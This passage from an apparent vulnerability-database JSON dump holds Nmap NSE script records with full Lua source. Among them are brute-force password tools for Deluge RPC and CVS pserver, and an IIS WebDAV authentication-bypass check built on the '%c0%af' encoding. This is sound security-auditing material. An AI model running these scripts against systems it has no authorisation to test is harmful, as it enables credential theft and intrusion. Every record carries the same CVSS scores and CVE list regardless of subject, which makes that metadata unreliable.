the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script deluge-rpc-brute -p 58846 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON TTL\n 58846/tcp open unknown syn-ack 0\n | deluge-rpc-brute:\n | Accounts\n | admin:default - Valid credentials\n | Statistics\n |_ Performed 8 guesses in 1 seconds, average tps: 8\n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n * [zlib](<../lib/zlib.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-18T17:10:59", "type": "nmap", "title": "deluge-rpc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-07-20T20:58:30", "id": "NMAP:DELUGE-RPC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/deluge-rpc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\nlocal have_zlib, zlib = pcall(require, \"zlib\")\n\ndescription = [[\nPerforms brute force password auditing against the DelugeRPC daemon.\n]]\n\n---\n-- @usage\n-- nmap --script deluge-rpc-brute -p 58846 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON TTL\n-- 58846/tcp open unknown syn-ack 0\n-- | deluge-rpc-brute:\n-- | Accounts\n-- | admin:default - Valid credentials\n-- | Statistics\n-- |_ Performed 8 guesses in 1 seconds, average tps: 8\n\nauthor = \"Claudiu Perta <claudiu.perta@gmail.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(58846, \"deluge-rpc\")\n\n-- Returns an rencoded login request with the given username and password.\n-- The format of the login command is the following:\n--\n-- ((0, 'daemon.login', ('username', 'password'), {}),)\n--\n-- This is inspired from deluge source code, in particular, see\n-- http://git.deluge-torrent.org/deluge/tree/deluge/rencode.py\nlocal rencoded_login_request = function(username, password)\n local INT_POS_FIXED_START = 0\n local INT_POS_FIXED_COUNT = 44\n\n -- Dictionaries with length embedded in typecode.\n local DICT_FIXED_START = 102\n local DICT_FIXED_COUNT = 25\n\n -- Strings with length embedded in typecode.\n local STR_FIXED_START = 128\n local STR_FIXED_COUNT = 64\n\n -- Lists with length embedded in typecode.\n local LIST_FIXED_START = 192\n local LIST_FIXED_COUNT = 64\n\n if #username > 0xff - STR_FIXED_START then\n return nil, \"Username too long\"\n elseif #password > 0xff - STR_FIXED_START then\n return nil, \"Password too long\"\n end\n\n -- Encode the login request:\n -- ((0, 'daemon.login', ('username', 'password'), {}),)\n local request = string.pack(\"BBBB\",\n LIST_FIXED_START + 1,\n LIST_FIXED_START + 4,\n INT_POS_FIXED_START,\n STR_FIXED_START + string.len(\"daemon.login\")\n )\n .. \"daemon.login\"\n .. string.pack(\"BB\",\n LIST_FIXED_START + 2,\n STR_FIXED_START + string.len(username)\n )\n .. username\n .. string.pack(\"B\",\n STR_FIXED_START + string.len(password)\n )\n .. password\n .. string.pack(\"B\", DICT_FIXED_START)\n\n return request\nend\n\nDriver = {\n\n new = function(self, host, port, invalid_users)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.invalid_users = invalid_users\n return o\n end,\n\n connect = function(self)\n local status, err\n self.socket = brute.new_socket()\n self.socket:set_timeout(\n ((self.host.times and self.host.times.timeout) or 8) * 1000)\n\n local status, err = self.socket:connect(self.host, self.port, \"ssl\")\n if not status then\n return false, brute.Error:new(\"Failed to connect to server\")\n end\n\n return true\n end,\n\n disconnect = function(self)\n self.socket:close()\n end,\n\n login = function(self, username, password)\n if (self.invalid_users[username]) then\n return false, brute.Error:new(\"Invalid user\")\n end\n\n local request, err = rencoded_login_request(username, password)\n if not request then\n return false, brute.Error:new(err)\n end\n local status, err = self.socket:send(zlib.compress(request))\n\n if not status then\n return false, brute.Error:new(\"Login error\")\n end\n\n local status, response = self.socket:receive()\n if not status then\n\n return false, brute.Error:new(\"Login error\")\n end\n\n response = zlib.decompress(response)\n if response:match(\"BadLoginError\") then\n local error_message = \"Login error\"\n if response:match(\"Username does not exist\") then\n self.invalid_users[username] = true\n error_message = \"Username not found\"\n elseif response:match(\"Password does not match\") then\n error_message = \"Username not found\"\n end\n return false, brute.Error:new(error_message)\n end\n\n return true, creds.Account:new(username, password, creds.State.VALID)\n end,\n\n check = function(self)\n return true\n end\n}\n\naction = function(host, port)\n\n if not have_zlib then\n return \"Error: zlib required!\"\n end\n\n local invalid_users = {}\n local engine = brute.Engine:new(Driver, host, port, invalid_users)\n\n engine.options.script_name = SCRIPT_NAME\n local status, results = engine:start()\n\n return results\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:36:33", "description": "NOTE: This script has been replaced by the `--resolve-all` command-line option in Nmap 7.70 \n\nResolves hostnames and adds every address (IPv4 or IPv6, depending on Nmap mode) to Nmap's target list. This differs from Nmap's normal host resolution process, which only scans the first address (A or AAAA record) returned for each host name. \n\nThe script will run on any target provided by hostname. It can also be fed hostnames via the `resolveall.hosts` argument. Because it adds new targets by IP address it will not run recursively, since those new targets were not provided by hostname. It will also not add the same IP that was initially chosen for scanning by Nmap.\n\n## Script Arguments \n\n#### resolveall.hosts \n\nTable of hostnames to resolve\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=resolveall --script-args=newtargets,resolveall.hosts={<host1>, ...} ...\n nmap --script=resolveall manyaddresses.example.com\n\n## Script Output \n \n \n Pre-scan script results:\n | resolveall:\n | Host 'google.com' resolves to:\n | 74.125.39.106\n | 74.125.39.147\n | 74.125.39.99\n | 74.125.39.103\n | 74.125.39.105\n | 74.125.39.104\n |_ Successfully added 6 new targets\n Host script results:\n | resolveall:\n | Host 'chat.freenode.net' also resolves to:\n | 94.125.182.252\n | 185.30.166.37\n | 162.213.39.42\n | 193.10.255.100\n | 139.162.227.51\n | 195.154.200.232\n | 164.132.77.237\n | 185.30.166.38\n | 130.185.232.126\n | 38.229.70.22\n |_ Successfully added 10 new targets\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [target](<../lib/target.html>)\n * [ipOps](<../lib/ipOps.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-09-28T02:04:20", "type": "nmap", "title": "resolveall NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-07-25T14:13:28", "id": "NMAP:RESOLVEALL.NSE", "href": "https://nmap.org/nsedoc/scripts/resolveall.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal target = require \"target\"\nlocal ipOps = require \"ipOps\"\n\ndescription = [[\nNOTE: This script has been replaced by the <code>--resolve-all</code>\ncommand-line option in Nmap 7.70\n\nResolves hostnames and adds every address (IPv4 or IPv6, depending on\nNmap mode) to Nmap's target list. This differs from Nmap's normal\nhost resolution process, which only scans the first address (A or AAAA\nrecord) returned for each host name.\n\nThe script will run on any target provided by hostname. It can also be fed\nhostnames via the <code>resolveall.hosts</code> argument. Because it adds new\ntargets by IP address it will not run recursively, since those new targets were\nnot provided by hostname. It will also not add the same IP that was initially\nchosen for scanning by Nmap.\n]]\n\n---\n-- @usage\n-- nmap --script=resolveall --script-args=newtargets,resolveall.hosts={<host1>, ...} ...\n-- nmap --script=resolveall manyaddresses.example.com\n-- @args resolveall.hosts Table of hostnames to resolve\n-- @output\n-- Pre-scan script results:\n-- | resolveall:\n-- | Host 'google.com' resolves to:\n-- | 74.125.39.106\n-- | 74.125.39.147\n-- | 74.125.39.99\n-- | 74.125.39.103\n-- | 74.125.39.105\n-- | 74.125.39.104\n-- |_ Successfully added 6 new targets\n-- Host script results:\n-- | resolveall:\n-- | Host 'chat.freenode.net' also resolves to:\n-- | 94.125.182.252\n-- | 185.30.166.37\n-- | 162.213.39.42\n-- | 193.10.255.100\n-- | 139.162.227.51\n-- | 195.154.200.232\n-- | 164.132.77.237\n-- | 185.30.166.38\n-- | 130.185.232.126\n-- | 38.229.70.22\n-- |_ Successfully added 10 new targets\n-- @xmloutput\n-- <elem key=\"newtargets\">4</elem>\n-- <table key=\"hosts\">\n-- <table key=\"google.com\">\n-- <elem>74.125.39.106</elem>\n-- <elem>74.125.39.147</elem>\n-- <elem>74.125.39.99</elem>\n-- <elem>74.125.39.103</elem>\n-- </table>\n-- </table>\n\nauthor = \"Kris Katterjohn\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"safe\", \"discovery\"}\n\n\nprerule = function()\n return stdnse.get_script_args(\"resolveall.hosts\")\nend\n\nhostrule = function(host)\n return host.targetname\nend\n\nlocal addtargets = function(list)\n local sum = 0\n\n for _, t in ipairs(list) do\n local st, err = target.add(t)\n if st then\n sum = sum + 1\n else\n stdnse.debug1(\"Couldn't add target %s: %s\", t, err)\n end\n end\n\n return sum\nend\n\npreaction = function()\n local hosts = stdnse.get_script_args(\"resolveall.hosts\")\n\n if type(hosts) ~= \"table\" then\n hosts = {hosts}\n end\n\n local sum = 0\n local output = {}\n local xmloutput = {}\n for _, host in ipairs(hosts) do\n local status, list = nmap.resolve(host, nmap.address_family())\n if status and #list > 0 then\n if target.ALLOW_NEW_TARGETS then\n sum = sum + addtargets(list)\n end\n xmloutput[host] = list\n table.insert(output, string.format(\"Host '%s' resolves to:\", host))\n table.insert(output, list)\n end\n end\n\n xmloutput = {\n hosts = xmloutput,\n newtargets = sum or 0,\n }\n if sum > 0 then\n table.insert(output, string.format(\"Successfully added %d new targets\", sum))\n else\n table.insert(output, \"Use the 'newtargets' script-arg to add the results as targets\")\n end\n table.insert(output, \"Use the --resolve-all option to scan all resolved addresses without using this script.\")\n return xmloutput, stdnse.format_output(true, output)\nend\n\nhostaction = function(host)\n local sum = 0\n local output = {}\n local status, list = nmap.resolve(host.targetname, nmap.address_family())\n if not status or #list <= 0 then\n return nil\n end\n -- Don't re-add this same IP!\n for i = #list, 1, -1 do\n if ipOps.compare_ip(list[i], \"eq\", host.ip) then\n table.remove(list, i)\n end\n end\n if target.ALLOW_NEW_TARGETS then\n sum = sum + addtargets(list)\n end\n table.insert(output, string.format(\"Host '%s' also resolves to:\", host.targetname))\n table.insert(output, list)\n\n local xmloutput = {\n addresses = list,\n newtargets = sum or 0,\n }\n if sum > 0 then\n table.insert(output, string.format(\"Successfully added %d new targets\", sum))\n else\n table.insert(output, \"Use the 'newtargets' script-arg to add the results as targets\")\n end\n table.insert(output, (\"Use the --resolve-all option to scan all resolved addresses without using this script.\"):format(host.targetname))\n return xmloutput, stdnse.format_output(true, output)\nend\n\nlocal ActionsTable = {\n -- prerule: resolve via script-args\n prerule = preaction,\n -- hostrule: resolve via scanned host\n hostrule = hostaction\n}\n\n-- execute the action function corresponding to the current rule\naction = function(...) return ActionsTable[SCRIPT_TYPE](...) end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:32", "description": "Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, <https://nmap.org/r/ms09-020>. \n\nA list of well known folders (almost 900) is used by default. Each one is checked, and if returns an authentication request (401), another attempt is tried with the malicious encoding. If that attempt returns a successful result (207), then the folder is marked as vulnerable. \n\nThis script is based on the Metasploit auxiliary module auxiliary/scanner/http/wmap_dir_webdav_unicode_bypass \n\nFor more information on this vulnerability and script, see: \n\n * <http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html>\n * <http://seclists.org/fulldisclosure/2009/May/att-134/IIS_Advisory_pdf.bin>\n * <http://www.skullsecurity.org/blog/?p=271>\n * <http://www.kb.cert.org/vuls/id/787932>\n * <http://www.microsoft.com/technet/security/advisory/971492.mspx>\n\n## Script Arguments \n\n#### basefolder \n\nThe folder to start in; eg, `\"/web\"` will try `\"/web/xxx\"`.\n\n#### folderdb \n\nThe filename of an alternate list of folders.\n\n#### webdavfolder \n\nSelects a single folder to use, instead of using a built-in list.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-iis-webdav-vuln -p80,8080 <host>\n \n\n## Script Output \n \n \n 80/tcp open http syn-ack\n |_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /secret, /webdav\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-05-20T00:43:30", "type": "nmap", "title": "http-iis-webdav-vuln NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:HTTP-IIS-WEBDAV-VULN.NSE", "href": "https://nmap.org/nsedoc/scripts/http-iis-webdav-vuln.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access\nsecured WebDAV folders by searching for a password-protected folder and\nattempting to access it. This vulnerability was patched in Microsoft Security\nBulletin MS09-020, https://nmap.org/r/ms09-020.\n\nA list of well known folders (almost 900) is used by default. Each one is\nchecked, and if returns an authentication request (401), another attempt is\ntried with the malicious encoding. If that attempt returns a successful result\n(207), then the folder is marked as vulnerable.\n\nThis script is based on the Metasploit auxiliary module\nauxiliary/scanner/http/wmap_dir_webdav_unicode_bypass\n\nFor more information on this vulnerability and script, see:\n* http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html\n* http://seclists.org/fulldisclosure/2009/May/att-134/IIS_Advisory_pdf.bin\n* http://www.skullsecurity.org/blog/?p=271\n* http://www.kb.cert.org/vuls/id/787932\n* http://www.microsoft.com/technet/security/advisory/971492.mspx\n]]\n\n---\n-- @usage\n-- nmap --script http-iis-webdav-vuln -p80,8080 <host>\n--\n-- @output\n-- 80/tcp open http syn-ack\n-- |_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /secret, /webdav\n--\n-- @args webdavfolder Selects a single folder to use, instead of using a built-in list.\n-- @args folderdb The filename of an alternate list of folders.\n-- @args basefolder The folder to start in; eg, <code>\"/web\"</code> will try <code>\"/web/xxx\"</code>.\n-----------------------------------------------------------------------\n\nauthor = {\"Ron Bowes\", \"Andrew Orr\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"intrusive\"}\n\n\nportrule = shortport.http\n\n---Enumeration for results\nlocal enum_results =\n{\n VULNERABLE = 1,\n NOT_VULNERABLE = 2,\n UNKNOWN = 3\n}\n\n---Sends a PROPFIND request to the given host, and for the given folder. Returns a table representing a response.\nlocal function get_response(host, port, folder)\n local webdav_req = '<?xml version=\"1.0\" encoding=\"utf-8\"?><propfind xmlns=\"DAV:\"><prop><getcontentlength xmlns=\"DAV:\"/><getlastmodified xmlns=\"DAV:\"/><executable xmlns=\"http://apache.org/dav/props/\"/><resourcetype xmlns=\"DAV:\"/><checked-in xmlns=\"DAV:\"/><checked-out xmlns=\"DAV:\"/></prop></propfind>'\n\n local options = {\n header = {\n Connection = \"close\",\n [\"Content-Type\"] = \"application/xml\",\n },\n content = webdav_req\n }\n\n return http.generic_request(host, port, \"PROPFIND\", folder, options)\nend\n\n---Check a single folder on a single host for the vulnerability. Returns one of the enum_results codes.\nlocal function go_single(host, port, folder)\n local response\n\n response = get_response(host, port, folder)\n if(response.status == 401) then\n local vuln_response\n local check_folder\n\n stdnse.debug1(\"Found protected folder (401): %s\", folder)\n\n -- check for IIS 6.0 and 5.1\n -- doesn't appear to work on 5.0\n -- /secret/ becomes /s%c0%afecret/\n check_folder = string.sub(folder, 1, 2) .. \"%c0%af\" .. string.sub(folder, 3)\n vuln_response = get_response(host, port, check_folder)\n if(vuln_response.status == 207) then\n stdnse.debug1(\"Folder seems vulnerable: %s\", folder)\n return enum_results.VULNERABLE\n else\n stdnse.debug1(\"Folder does not seem vulnerable: %s\", folder)\n return enum_results.NOT_VULNERABLE\n end\n else\n if(response['status-line'] ~= nil) then\n stdnse.debug3(\"Not a protected folder (%s): %s\", response['status-line'], folder)\n elseif(response['status'] ~= nil) then\n stdnse.debug3(\"Not a protected folder (%s): %s\", response['status'], folder)\n else\n stdnse.debug3(\"Not a protected folder: %s\",folder)\n end\n return enum_results.UNKNOWN\n end\nend\n\n---Checks a list of possible folders for the vulnerability. Returns a list of vulnerable folders.\nlocal function go(host, port)\n local status, folder\n local results = {}\n local is_vulnerable = true\n\n local folder_file\n local farg = nmap.registry.args.folderdb\n folder_file = farg and (nmap.fetchfile(farg) or farg) or nmap.fetchfile('nselib/data/http-folders.txt')\n\n if(folder_file == nil) then\n return false, \"Couldn't find http-folders.txt (should be in nselib/data)\"\n end\n\n local file = io.open(folder_file, \"r\")\n if not file then\n return false, (\"Couldn't find or open %s\"):format(folder_file)\n end\n\n while true do\n local result\n local line = file:read()\n if not line then\n break\n end\n\n if(nmap.registry.args.basefolder ~= nil) then\n line = \"/\" .. nmap.registry.args.basefolder .. \"/\" .. line\n else\n line = \"/\" .. line\n end\n\n result = go_single(host, port, line)\n if(result == enum_results.VULNERABLE) then\n results[#results + 1] = line\n elseif(result == enum_results.NOT_VULNERABLE) then\n is_vulnerable = false\n else\n end\n end\n\n file:close()\n\n return true, results, is_vulnerable\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n -- Start by checking if '/' is protected -- if it is, we can't do the tests\n local result = go_single(host, port, \"/\")\n if(result == enum_results.NOT_VULNERABLE) then\n stdnse.debug1(\"Root folder is password protected, aborting.\")\n return nmap.verbosity() > 0 and \"Could not determine vulnerability, since root folder is password protected\" or nil\n end\n\n stdnse.debug1(\"Root folder is not password protected, continuing...\")\n\n local response = get_response(host, port, \"/\")\n if(response.status == 501) then\n -- WebDAV is disabled\n stdnse.debug1(\"WebDAV is DISABLED (PROPFIND failed).\")\n return nmap.verbosity() > 0 and \"WebDAV is DISABLED. Server is not currently vulnerable.\" or nil\n else\n if(response.status == 207) then\n -- PROPFIND works, WebDAV is enabled\n stdnse.debug1(\"WebDAV is ENABLED (PROPFIND was successful).\")\n else\n -- probably not running IIS 5.0/5.1/6.0\n if(response['status-line'] ~= nil) then\n stdnse.debug1(\"PROPFIND request failed with \\\"%s\\\".\", response['status-line'])\n elseif(response['status'] ~= nil) then\n stdnse.debug1(\"PROPFIND request failed with \\\"%s\\\".\", response['status'])\n else\n stdnse.debug1(\"PROPFIND request failed.\")\n end\n return fail(\"This web server is not supported.\")\n end\n end\n\n\n if(nmap.registry.args.webdavfolder ~= nil) then\n local folder = nmap.registry.args.webdavfolder\n local result = go_single(host, port, \"/\" .. folder)\n\n if(result == enum_results.VULNERABLE) then\n return string.format(\"WebDAV is ENABLED. Folder is vulnerable: %s\", folder)\n elseif(result == enum_results.NOT_VULNERABLE) then\n return nmap.verbosity() > 0 and string.format(\"WebDAV is ENABLED. Folder is NOT vulnerable: %s\", folder) or nil\n else\n return nmap.verbosity() > 0 and string.format(\"WebDAV is ENABLED. Could not determine vulnerability of folder: %s\", folder) or nil\n end\n\n else\n local status, results, is_vulnerable = go(host, port)\n\n if(status == false) then\n return fail(results)\n else\n if(#results == 0) then\n if(is_vulnerable == false) then\n return nmap.verbosity() > 0 and \"WebDAV is ENABLED. Protected folder found but could not be exploited. Server does not appear to be vulnerable.\" or nil\n else\n return nmap.verbosity() > 0 and \"WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=<path>\" or nil\n end\n else\n return \"WebDAV is ENABLED. Vulnerable folders discovered: \" .. table.concat(results, \", \")\n end\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:17", "description": "Performs brute force password auditing against CVS pserver authentication.\n\n## Script Arguments \n\n#### cvs-brute.repo \n\nstring containing the name of the repository to brute if no repo was given the script checks the registry for any repositories discovered by the cvs-brute-repository script. If the registry contains any discovered repositories, the script attempts to brute force the credentials for the first one.\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 2401 --script cvs-brute <host>\n \n\n## Script Output \n \n \n 2401/tcp open cvspserver syn-ack\n | cvs-brute:\n | Accounts\n | hotchner:francisco - Account is valid\n | reid:secret - Account is valid\n | Statistics\n |_ Performed 544 guesses in 14 seconds, average tps: 38\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [cvs](<../lib/cvs.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-07-21T06:01:19", "type": "nmap", "title": "cvs-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:CVS-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/cvs-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal cvs = require \"cvs\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPerforms brute force password auditing against CVS pserver authentication.\n]]\n\n---\n-- @usage\n-- nmap -p 2401 --script cvs-brute <host>\n--\n-- @output\n-- 2401/tcp open cvspserver syn-ack\n-- | cvs-brute:\n-- | Accounts\n-- | hotchner:francisco - Account is valid\n-- | reid:secret - Account is valid\n-- | Statistics\n-- |_ Performed 544 guesses in 14 seconds, average tps: 38\n--\n-- @args cvs-brute.repo string containing the name of the repository to brute\n-- if no repo was given the script checks the registry for any\n-- repositories discovered by the cvs-brute-repository script. If the\n-- registry contains any discovered repositories, the script attempts to\n-- brute force the credentials for the first one.\n\n-- Version 0.1\n-- Created 07/13/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\ndependencies = {\"cvs-brute-repository\"}\n\n\nportrule = shortport.port_or_service(2401, \"cvspserver\")\n\nDriver =\n{\n\n new = function(self, host, port, repo)\n local o = { repo = repo, helper = cvs.Helper:new(host, port) }\n setmetatable(o, self)\n self.__index = self\n return o\n end,\n\n connect = function( self )\n self.helper:connect(brute.new_socket())\n return true\n end,\n\n login = function( self, username, password )\n local status, err = self.helper:login( self.repo, username, password )\n if ( status ) then\n return true, creds.Account:new(username, password, creds.State.VALID)\n end\n\n -- This error seems to indicate that the user does not exist\n if ( err:match(\"E PAM start error%: Critical error %- immediate abort\\0$\") ) then\n stdnse.debug2(\"The user %s does not exist\", username)\n local err = brute.Error:new(\"Account invalid\")\n err:setInvalidAccount(username)\n return false, err\n end\n return false, brute.Error:new( \"Incorrect password\" )\n end,\n\n disconnect = function( self )\n self.helper:close()\n end,\n\n}\n\nlocal function getDiscoveredRepos(host)\n\n if ( not(host.registry.cvs_repos)) then\n return\n end\n\n return host.registry.cvs_repos\nend\n\naction = function(host, port)\n\n local repo = stdnse.get_script_args(\"cvs-brute.repo\") and\n { stdnse.get_script_args(\"cvs-brute.repo\") } or\n getDiscoveredRepos(host)\n if ( not(repo) ) then stdnse.verbose1(\"ERROR: No CVS repository specified (see cvs-brute.repo)\") end\n\n local status, result\n\n -- If repositories were discovered and not overridden by argument\n -- only attempt to brute force the first one.\n local engine = brute.Engine:new(Driver, host, port, repo[1])\n\n engine.options.script_name = SCRIPT_NAME\n status, result = engine:start()\n\n return result\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:49", "description": "Checks if a host is infected with Conficker.C or higher, based on Conficker's peer to peer communication. \n\nWhen Conficker.C or higher infects a system, it opens four ports: two TCP and two UDP. The ports are random, but are seeded with the current week and the IP of the infected host. By determining the algorithm, one can check if these four ports are open, and can probe them for more data. \n\nOnce the open ports are found, communication can be initiated using Conficker's custom peer to peer protocol. If a valid response is received, then a valid Conficker infection has been found. \n\nThis check won't work properly on a multihomed or NATed system because the open ports will be based on a nonpublic IP. The argument `checkall` tells Nmap to attempt communication with every open port (much like a version check) and the argument `realip` tells Nmap to base its port generation on the given IP address instead of the actual IP. \n\nBy default, 